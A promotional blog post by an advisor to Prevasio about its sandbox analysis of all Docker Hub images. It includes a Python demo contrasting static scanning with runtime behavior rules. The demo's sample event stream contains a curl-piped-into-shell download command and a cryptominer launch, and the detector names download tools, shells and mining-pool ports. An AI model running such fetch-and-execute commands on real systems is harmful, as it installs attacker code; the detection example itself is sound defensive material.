Docker, a way of packaging and running applications as containers (self-contained units that bundle a program with its dependencies and can be composed, Lego-block fashion, into larger systems), is taking the enterprise world by storm. With customers that count among the most technology-forward companies in the world (Netflix, AT&T, PayPal, Snowflake, Verizon, Target, and many others), it has become the new standard for deploying robust, distributed applications. At the core is Docker Hub, the main public registry of Docker container images, with over 4 million images*.
With so many enterprises and institutions running Docker, security is a concern, and security vendors such as StackRox, Aqua and Snyk have grown up to answer the call. I'm sure plenty of these vendors have analyzed containers, but in the end those analyses are only static analyses, without taking into account all of the complexities and actions that occur when one actually runs a container.
So I'm happy that today Prevasio, a company that I'm advising, has published the results of the first and only analysis of the entire Docker Hub. What Prevasio did is new and important: they actually went through the entire Docker Hub and ran each container to see what happens.
This is not a small task; the company spent tens of thousands of dollars in computing power on it. The Prevasio Analyzer also works differently from any other solution on the market: at its core is a sandbox that "detonates" (executes) each container and records what actually happens during its runtime. That gives a view no image scan can. A static analysis inspects the image's contents at rest (package inventories, file hashes, known-bad signatures), so it can report what an image contains but never what it will do; a payload fetched from the network after the container starts, or a binary that only misbehaves once executed, is invisible to it. For a real look, one needs to run the container and observe its behavior.
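To make the static-versus-behavioral distinction concrete, here is a small added illustration in Python. It is not Prevasio's analyzer or its rules, and everything in it is constructed for the demo: a fake image file inventory, a fake known-bad hash table, and a fake stream of runtime events (process executions, file writes, outbound connections) of the kind a sandbox records after `docker run`. The image looks clean at rest because the miner is only downloaded once the entrypoint runs; three simple behavior rules catch it anyway. The "mining-pool port" list and the drop-directory list are assumed heuristics, not vendor data.

```python
"""Toy illustration of why runtime (behavioral) analysis sees what a static
image scan cannot. Constructed data only; not Prevasio's analyzer or rules."""
import shlex
from typing import Iterable

# Rule parameters: assumptions for this demo, not vendor rules.
DOWNLOAD_TOOLS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "ash"}
# Ports commonly used by stratum mining pools (demo heuristic; a real sandbox
# would rather compare against the destinations the image is expected to use).
MINER_PORTS = {3333, 4444, 5555, 7777, 14444}
# World-writable locations where droppers typically stage payloads.
DROP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def static_findings(image_files: dict[str, str], bad_hashes: dict[str, str]) -> list[str]:
    """What a signature-style static scan sees: every file in the image layers,
    hashed and looked up in a known-bad table. Files that only appear after the
    container starts are, by construction, not in `image_files`."""
    return [f"{path}: {bad_hashes[digest]}"
            for path, digest in sorted(image_files.items()) if digest in bad_hashes]


def _basename(prog: str) -> str:
    return prog.rsplit("/", 1)[-1]


def _pipes_download_into_shell(cmdline: str) -> bool:
    """True for 'curl ... | sh', 'wget -qO- ... | bash' and similar pipelines."""
    stages = [shlex.split(stage) for stage in cmdline.split("|")]
    heads = [_basename(stage[0]) for stage in stages if stage]
    if not heads:
        return False
    return any(h in DOWNLOAD_TOOLS for h in heads[:-1]) and heads[-1] in SHELLS


def behavioral_findings(events: Iterable[dict]) -> list[str]:
    """Apply behavior rules to the event stream a sandbox records while the
    container runs: process execs, file writes and outbound connects."""
    findings: list[str] = []
    dropped: set[str] = set()  # files written into staging dirs at runtime
    for ev in events:
        if ev["type"] == "exec":
            argv = ev["argv"]
            # Rule 1: a shell whose command line pipes a download into a shell.
            if (_basename(argv[0]) in SHELLS and len(argv) >= 3 and argv[1] == "-c"
                    and _pipes_download_into_shell(argv[2])):
                findings.append(f"download-and-execute: {argv[2]}")
            # Rule 2: executing something that did not exist in the image at rest.
            if argv[0] in dropped:
                findings.append(f"runtime-dropped file executed: {argv[0]}")
        elif ev["type"] == "write" and ev["path"].startswith(DROP_DIRS):
            dropped.add(ev["path"])
        # Rule 3: outbound connection to a port typical of mining pools.
        elif ev["type"] == "connect" and ev["port"] in MINER_PORTS:
            findings.append(f"connect to likely mining-pool port: {ev['dst']}:{ev['port']}")
    return findings


# --- Constructed sample: an image whose entrypoint fetches a miner at runtime ---
IMAGE_FILES = {  # path -> digest; digests are placeholders, not real hashes
    "/bin/sh": "sha256:0a11",
    "/usr/bin/curl": "sha256:0b22",
    "/entrypoint.sh": "sha256:0c33",
}
KNOWN_BAD = {"sha256:dead": "XMRig cryptominer"}  # never present in the image at rest

RUNTIME_EVENTS = [  # what the sandbox observes after `docker run` (constructed)
    {"t": 0.01, "type": "exec", "argv": ["/bin/sh", "/entrypoint.sh"]},
    {"t": 0.05, "type": "exec", "argv": ["/bin/sh", "-c", "curl -s http://198.51.100.7/x.sh | sh"]},
    {"t": 0.30, "type": "connect", "dst": "198.51.100.7", "port": 80},
    {"t": 1.20, "type": "write", "path": "/tmp/.x/xmrig"},
    {"t": 1.25, "type": "exec", "argv": ["/tmp/.x/xmrig", "-o", "203.0.113.9:3333"]},
    {"t": 1.40, "type": "connect", "dst": "203.0.113.9", "port": 3333},
]

if __name__ == "__main__":
    print("static :", static_findings(IMAGE_FILES, KNOWN_BAD) or "nothing found")
    for finding in behavioral_findings(RUNTIME_EVENTS):
        print("runtime:", finding)
```

The static pass returns nothing because the only known-bad artifact is never in the image's layers; the behavioral pass returns three findings from the same container. The rules are deliberately simple; the point is that they operate on what the container did, which is data a scan of the image at rest does not have.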
Some of the results are troubling:
- 51 percent of all container images had "critical" vulnerabilities, while 13 percent were classified as "high" and 4 percent as "moderate".
- Six thousand images contained cryptominers, hacking tools and pen-testing frameworks, or backdoor trojans. Many cryptominers and hacking tools are not malicious per se, but they are potentially unwanted software in an enterprise environment.
- Over 400 images (with over 500,000 pulls between them) carried weaponized Windows malware that has crossed over into the Linux world. This crossover is a direct result of the proliferation of cross-platform languages and runtimes (e.g. Go, .NET Core and PowerShell Core): malware written against them builds and runs on Linux as readily as on Windows.
The full whitepaper is here, and Prevasio’s blog post is here.
But if you want to have some fun, Prevasio has made all of the data publicly available on their site, at malware.prevasio.com. Feel free to look at the results for yourself.
*A container image is the read-only template (a set of filesystem layers plus metadata such as the entrypoint) from which running Docker containers are created.